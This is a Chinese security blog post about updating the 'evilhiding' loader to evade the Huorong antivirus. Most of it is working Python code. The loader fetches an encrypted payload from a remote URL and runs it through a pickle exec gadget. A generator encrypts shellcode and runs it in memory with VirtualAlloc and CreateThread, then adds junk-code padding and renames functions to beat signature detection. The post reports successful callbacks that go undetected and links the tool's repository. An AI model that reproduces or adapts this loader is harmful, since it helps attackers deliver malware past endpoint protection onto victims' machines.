记一次绕过火绒的免杀探索

admin 2023年11月3日09:15:48评论19 views字数 5188阅读17分17秒阅读模式

关注并星标🌟 一起学安全❤️

作者:coleak  

首发于公号:渗透测试安全攻防 

字数:2062

声明:仅供学习参考,请勿用作违法用途

目录

  • 前记

  • 查杀排查

  • 源码修改

  • 免杀效果测试

前记

evilhiding昨天被提issue不能绕过火绒了,于是今天更新了evilhiding v1.1,已经可以继续免杀了。

期待各位的stars,项目地址如下:

https://github.com/coleak2021/evilhiding

查杀排查

直接python运行b.py发现未被查杀,且可正常上线,但是通过pyinstaller打包为exe后发现被火绒查杀,因此打算对源代码进行修改来绕过火绒

于是对b.py关键部分分别打包检查,发现均未被查杀

加载器

import pickle,base64,requests,ctypes
from cryptography.fernet import Fernet

url=''
def O7867890(sectr):
KEY=b'Lo8QurfIObo62aKQsQjnzAocsnrrIkTsJewRJLLKAsA='
fernet = Fernet(KEY)
destr = fernet.decrypt(sectr).decode()
class A(object):
def __reduce__(self):
return (exec, (destr,))

ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode)

执行器

def O1674418():
try:
r=requests.get(url)
a = r.status_code
except:
a = 404
pass

if a == 200:
O7867890(r.text)
else:
pass

if __name__ == '__main__':
exec(t1)
exec(t2)
O1674418()

花指令

t2 ="""
import base64

st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
"""

t1 ="""
import random

def O4402217(test_arr, low, high):
i = (low - 1)
pivot = test_arr[high]

for j in range(low, high):
if test_arr[j] <= pivot:
i = i + 1
test_arr[i], test_arr[j] = test_arr[j], test_arr[i]

test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1]
return i + 1


def O7313740(test_arr, low, high):
if low < high:
pi = O4402217(test_arr, low, high)
O7313740(test_arr, low, pi - 1)
O7313740(test_arr, pi + 1, high)


test_arr= []
for i in range(59999):
test_arr.append(random.random())
n= len(test_arr)
O7313740(test_arr,0, n - 1)
"""

得出结论:各部分可以分别正常打包,但是火绒对整体进行了特征提取,因此我们只需要将文件结构做修改即可

源码修改

经过测试,最终对b.py修改为如下,此时打包为exe可绕过火绒正常上线

from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random

url=''
def O7867890(sectr):
KEY=b''
fernet = Fernet(KEY)
destr = fernet.decrypt(sectr).decode()
class A(object):
def __reduce__(self):
return (exec, (destr,))
def say_hello(self):
exec(bbb)
a=A()
a.say_hello()
ret = pickle.dumps(a)
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode)

bbb ="""
import base64
st= 'cccccccccccccccccccooooooooooollllllllllllleeeeeeeeeeeeaaaaaaaaaaaakkkkkkkkk'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
"""

def O1674418():
try:
r=requests.get(url)
a = r.status_code
except:
a = 404
pass

if a == 200:
O7867890(r.text)
else:
pass

if __name__ == '__main__':
O1674418()

因此,对main.py生成器修改如下

# -*- coding: utf-8 -*-

import base64
import re,os,time
from cryptography.fernet import Fernet

shellcode = b""
url=''
key = Fernet.generate_key()
fernet = Fernet(key)
enstr = fernet.encrypt(shellcode)
key2 = Fernet.generate_key()
fernet2 = Fernet(key2)
a=f'''
import ctypes
from cryptography.fernet import Fernet
KEY={key}
fernet=Fernet(KEY)
shellcode=fernet.decrypt({enstr})

shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
'''

cccc=f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
url=f'{url}'
a=[]
class B():
def cc(self):
for i in range(5):
a.append(i)

def O7303771(sectr):
global destr
KEY={key2}
fernet = Fernet(KEY)
destr = fernet.decrypt(sectr).decode()
aaa(destr)

def aaa(destr):
class A(object):
def __reduce__(self):
return (exec, (destr,))
def O6294286(self):
exec(bbb)
a=A()
a.O6294286()
ret = pickle.dumps(a)
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode)

bbb ="""
for i in range(100):
aaa=B()
aaa.cc()
"""

def O0135984():
try:
r=requests.get(url)
a = r.status_code
except:
a = 404
pass

if a == 200:
O7303771(r.text)
else:
pass
if __name__ == '__main__':
O0135984()
'''

def hunxiao():
openfile = 'content.txt'
text = open(openfile, encoding='utf-8').read()
wd_df = re.findall("def (.*?)\(", text)
wd_df = list(set(wd_df))
for i in wd_df:
if i[0:2] == "__":
wd_df.remove(i)
if i == 'super':
wd_df.remove(i)
idlist = []
for i in wd_df:
idlist.append('O' + str(hash(i))[-7:])

cs = len(wd_df)
if cs == len(set(idlist)):
while cs > 0:
cs -= 1
text = text.replace(wd_df[cs] + '(', idlist[cs] + '(')
text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs])
text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs])
text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs])
else:
print('hash repeat')

file_save = open('b.py', 'w', encoding='utf-8')
file_save.write(text)
file_save.close()

with open('content.txt', 'bw') as f:
f.write(cccc.encode())
hunxiao()

with open('a.txt', 'bw') as f:
f.write(fernet2.encrypt(a.encode()))

with open('content.txt', 'br') as f:
content=base64.b64encode(f.read())

b = f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
cccc={content}
exec(base64.b64decode(cccc).decode())
'''

with open('b.py', 'w', encoding='utf-8') as f:
f.write(b)

iconame=f'{int (time.time() *1000)}.ico'
with open('coleak.ico',"br") as f:
cont=f.read()
with open(f'{iconame}',"bw") as f:
cont+=iconame.encode()
f.write(cont)
with open('create.py',"br") as f:
createit=f.read()
exec(createit)

免杀效果测试

记一次绕过火绒的免杀探索


记一次绕过火绒的免杀探索



文章首发于:渗透测试安全攻防

原文始发于微信公众号(渗透测试安全攻防):记一次绕过火绒的免杀探索

  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月3日09:15:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次绕过火绒的免杀探索https://cn-sec.com/archives/2169751.html

发表评论

匿名网友 填写信息